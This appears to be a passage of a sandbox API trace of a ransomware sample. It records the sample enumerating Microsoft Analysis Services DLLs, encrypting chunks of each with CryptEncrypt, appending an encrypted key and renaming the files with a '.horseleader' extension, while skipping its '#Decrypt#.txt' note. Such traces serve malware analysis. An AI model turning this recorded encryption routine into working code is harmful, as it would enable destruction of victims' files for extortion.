(in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.146] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.146] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.147] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.147] CloseHandle (hObject=0x158) returned 1 [0252.147] GetProcessHeap () returned 0x780000 [0252.147] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.147] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.horseleader") returned 86 [0252.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.horseleader")) returned 1 [0252.148] GetProcessHeap () returned 0x780000 [0252.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.148] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0252.148] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2="Windows") returned -1 [0252.148] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0252.148] StrStrIW (lpFirst="msmgdsrv.dll", lpSrch=".horseleader") returned 0x0 [0252.149] lstrcmpW 
(lpString1="msmgdsrv.dll", lpString2="#Decrypt#.txt") returned 1 [0252.149] lstrcmpW (lpString1="msmgdsrv.dll", lpString2="_uninstalling_.png") returned 1 [0252.149] lstrlenW (lpString=".testttjffg") returned 11 [0252.149] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll", lpSrch=".testttjffg") returned 0x0 [0252.149] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.149] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0252.150] StrStrW (lpFirst="msmgdsrv.dll", lpSrch=".txt") returned 0x0 [0252.150] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12338536) returned 1 [0252.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.150] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.153] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5dfab4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.154] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.158] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xbbf568, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.158] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.161] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.162] CloseHandle (hObject=0x158) returned 1 [0252.162] GetProcessHeap () returned 0x780000 [0252.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.162] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.horseleader") returned 85 [0252.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.horseleader")) returned 1 [0252.163] GetProcessHeap () returned 0x780000 [0252.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.164] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0252.164] lstrcmpiW (lpString1="msolap100.dll", lpString2="Windows") returned -1 [0252.164] wnsprintfW (in: pszDest=0x79b628, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0252.164] StrStrIW (lpFirst="msolap100.dll", lpSrch=".horseleader") returned 0x0 [0252.164] lstrcmpW (lpString1="msolap100.dll", lpString2="#Decrypt#.txt") returned 1 [0252.164] lstrcmpW (lpString1="msolap100.dll", lpString2="_uninstalling_.png") returned 1 [0252.164] lstrlenW (lpString=".testttjffg") returned 11 [0252.164] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll", lpSrch=".testttjffg") returned 0x0 [0252.164] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.164] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.165] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0252.165] StrStrW (lpFirst="msolap100.dll", lpSrch=".txt") returned 0x0 [0252.165] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8154984) returned 1 [0252.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.165] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 
[0252.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.173] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.175] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3e0fb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.175] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.177] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.177] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7c1f68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.178] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 
[0252.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.182] CloseHandle (hObject=0x158) returned 1 [0252.182] GetProcessHeap () returned 0x780000 [0252.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.182] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.horseleader") returned 86 [0252.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.horseleader")) returned 1 [0252.184] GetProcessHeap () returned 0x780000 [0252.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, 
nFileSizeLow=0x4dc18, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0252.184] lstrcmpiW (lpString1="msolui100.dll", lpString2="Windows") returned -1 [0252.184] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0252.184] StrStrIW (lpFirst="msolui100.dll", lpSrch=".horseleader") returned 0x0 [0252.184] lstrcmpW (lpString1="msolui100.dll", lpString2="#Decrypt#.txt") returned 1 [0252.184] lstrcmpW (lpString1="msolui100.dll", lpString2="_uninstalling_.png") returned 1 [0252.185] lstrlenW (lpString=".testttjffg") returned 11 [0252.185] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll", lpSrch=".testttjffg") returned 0x0 [0252.185] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.185] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0252.187] StrStrW (lpFirst="msolui100.dll", lpSrch=".txt") returned 0x0 [0252.187] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=318488) returned 1 [0252.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0252.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.191] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.191] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2460c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x48c18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.194] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0252.196] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.197] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.197] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.197] CloseHandle (hObject=0x158) returned 1 [0252.197] GetProcessHeap () returned 0x780000 [0252.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.197] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.horseleader") returned 86 [0252.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll.horseleader")) returned 1 [0252.199] GetProcessHeap () returned 0x780000 [0252.199] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.199] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0252.199] lstrcmpiW (lpString1="Resources", lpString2="Windows") returned -1 [0252.199] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned 70 [0252.199] lstrcmpW (lpString1="Resources", lpString2=".") returned 1 [0252.199] lstrcmpW (lpString1="Resources", lpString2="..") returned 1 [0252.199] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.199] GetProcessHeap () returned 0x780000 [0252.199] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*") returned 72 [0252.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0252.200] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0252.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\.") returned 72 [0252.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.200] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="..", cAlternateFileName="")) returned 1 [0252.201] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\..") returned 73 [0252.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.201] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="1033", cAlternateFileName="")) returned 1 [0252.201] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0252.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: 